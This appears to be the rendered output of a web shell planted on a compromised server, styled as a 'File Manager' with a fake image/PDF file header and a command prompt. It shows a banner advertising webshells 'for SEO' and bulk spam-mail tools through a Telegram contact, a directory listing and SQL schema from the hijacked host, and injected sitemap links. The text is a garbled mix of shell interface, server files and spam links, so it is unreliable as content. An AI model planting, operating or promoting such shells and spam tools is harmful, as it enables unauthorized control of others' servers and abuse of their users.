xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
CREATE TABLE  `ZSD_MONITOR_RULE_TYPES` (
	`TYPE_ID` VARCHAR(64) NOT NULL PRIMARY KEY,
	`TYPE_NAME` VARCHAR(128) NOT NULL
) Engine=Innodb;

CREATE TABLE  `ZSD_MONITOR_RULES` (
	`RULE_ID` BIGINT NOT NULL PRIMARY KEY AUTO_INCREMENT,
	`RULE_TYPE_ID` VARCHAR(128) NOT NULL,
	`RULE_PARENT_ID` INTEGER DEFAULT -1,
	`APP_ID` INTEGER NOT NULL DEFAULT -1,
	`NAME` VARCHAR(64) NOT NULL,
	`ENABLED` INTEGER NOT NULL DEFAULT 1,
	`DESCRIPTION` VARCHAR(256),
	`URL` TEXT,
	`CREATOR` INTEGER NOT NULL DEFAULT 0
) Engine=Innodb;

CREATE TABLE `ZSD_MONITOR_RULE_CONDITIONS` (
     `CONDITION_ID` BIGINT NOT NULL PRIMARY KEY AUTO_INCREMENT,
     `RULE_ID` INTEGER NOT NULL,
     `TRIGGER_ID` INTEGER NOT NULL,
     `OPERATION` VARCHAR(32) NOT NULL,
     `ATTRIBUTE` VARCHAR(32) NOT NULL,
     `OPERAND` TEXT
) Engine=Innodb;


CREATE TABLE  `ZSD_MONITOR_RULE_TRIGGERS` (
	`TRIGGER_ID` BIGINT NOT NULL PRIMARY KEY AUTO_INCREMENT,
	`RULE_ID` INTEGER NOT NULL,
	`SEVERITY` INTEGER NOT NULL DEFAULT 1
) Engine=Innodb;

CREATE TABLE  `ZSD_MONITOR_ACTIONS` (
	`ACTION_ID` BIGINT NOT NULL PRIMARY KEY AUTO_INCREMENT,
	`TRIGGER_ID` INTEGER NOT NULL,
	`ACTION_TYPE` INTEGER NOT NULL,
	`ACTION_URL` TEXT,
    `SEND_TO` VARCHAR(256),
    `TRACING_DURATION` INTEGER NOT NULL DEFAULT 0
) Engine=Innodb;

CREATE INDEX `ZSD_MONITOR_RULES_IDX1` ON `ZSD_MONITOR_RULES`(APP_ID);
CREATE UNIQUE INDEX `EXISTS ZSD_MONITOR_RULE_TRIGGERS_IDX1` ON `ZSD_MONITOR_RULE_TRIGGERS`(RULE_ID, SEVERITY);

Filemanager

Name Type Size Permission Actions
UserServer Folder 0755
azure-plugins Folder 0755
dist Folder 0755
libraries Folder 0755
minify Folder 0755
plugins Folder 0755
scripts Folder 0755
sdk Folder 0755
selinux Folder 0755
support_tool Folder 0775
zray-cleanup-scripts Folder 0755
zs-cli-tools Folder 0755
alias-linux-apache-2.4-fpm.tpl File 385 B 0644
alias-linux-apache-2.4.tpl File 310 B 0644
alias-nginx-root.tpl File 119 B 0644
alias-nginx.tpl File 112 B 0644
alias-pase-apache-2.4.tpl File 211 B 0644
alias-windows-apache-2.4.tpl File 181 B 0644
alias.tpl File 282 B 0644
browser_mysql_create_database.sql File 2.89 KB 0644
browser_sqlite_create_database.sql File 3.17 KB 0644
create_monitor_db.sql File 5.58 KB 0644
create_monitor_rules_db.sql File 1.37 KB 0644
create_monitor_rules_fixtures.sql File 8.36 KB 0644
create_monitor_tracing_db.sql File 906 B 0644
create_pagecache_rules_db.sql File 1.15 KB 0644
deployment.xsd File 11.33 KB 0644
deployment_mysql_create_database.sql File 6.69 KB 0644
deployment_sqlite_create_database.sql File 7.35 KB 0644
devbar_fixtures.sql File 1.27 KB 0644
devbar_mysql_create_database.sql File 7.6 KB 0644
devbar_sqlite_create_database.sql File 8.59 KB 0644
gui_ibmi_update_database.sql File 268 B 0644
gui_mysql_acl_fixtures.sql File 19 KB 0644
gui_mysql_create_database.sql File 7.29 KB 0644
gui_sqlite_acl_fixtures.sql File 18.34 KB 0644
gui_sqlite_create_database.sql File 7.58 KB 0644
index.php File 18.34 KB 0644
jobqueue_mysql_create_database.sql File 4.8 KB 0644
jobqueue_sqlite_create_database.sql File 4.93 KB 0644
mysql_create_message_center_db.sql File 6.7 KB 0644
mysql_create_monitor_db.sql File 6.64 KB 0644
mysql_create_monitor_rules_db.sql File 1.42 KB 0644
mysql_create_pagecache_rules_db.sql File 1.15 KB 0644
pagecache_purge.sql File 1.51 KB 0644
sqlite_create_message_center_db.sql File 7.28 KB 0644
statistics_mysql_create_database.sql File 4.37 KB 0644
statistics_sqlite_create_database.sql File 4.68 KB 0644
stats_mysql_fixtures.sql File 35.9 KB 0644
stats_sqlite_fixtures.sql File 30.03 KB 0644
statsd_mysql_create_database.sql File 4.59 KB 0644
statsd_sqlite_create_database.sql File 2.61 KB 0644
statsd_sqlite_pagecache_create_database.sql File 2.67 KB 0644
urlinsight_mysql_create_database.sql File 2.58 KB 0644
urlinsight_sqlite_create_database.sql File 2.75 KB 0644
vhost-apache-2.4-fpm.tpl File 832 B 0644
vhost-apache-2.4.tpl File 726 B 0644
vhost-nginx-ssl.tpl File 426 B 0644
vhost-nginx.tpl File 292 B 0644
vhost-pase-apache-2.4.tpl File 480 B 0644
vhost-pase-ssl-apache-2.4.tpl File 536 B 0644
vhost-ssl-apache-2.4-fpm.tpl File 1013 B 0644
vhost-ssl-apache-2.4.tpl File 900 B 0644
vhost-ssl.tpl File 618 B 0644
vhost-windows-ssl-apache-2.4.tpl File 719 B 0644
vhost.tpl File 444 B 0644
zsd_mysql_create_schema.sql File 11.54 KB 0644
zsd_mysql_fixtures.sql File 367 B 0644
zsd_sqlite_create_schema.sql File 11.12 KB 0644
zsd_sqlite_fixtures.sql File 363 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml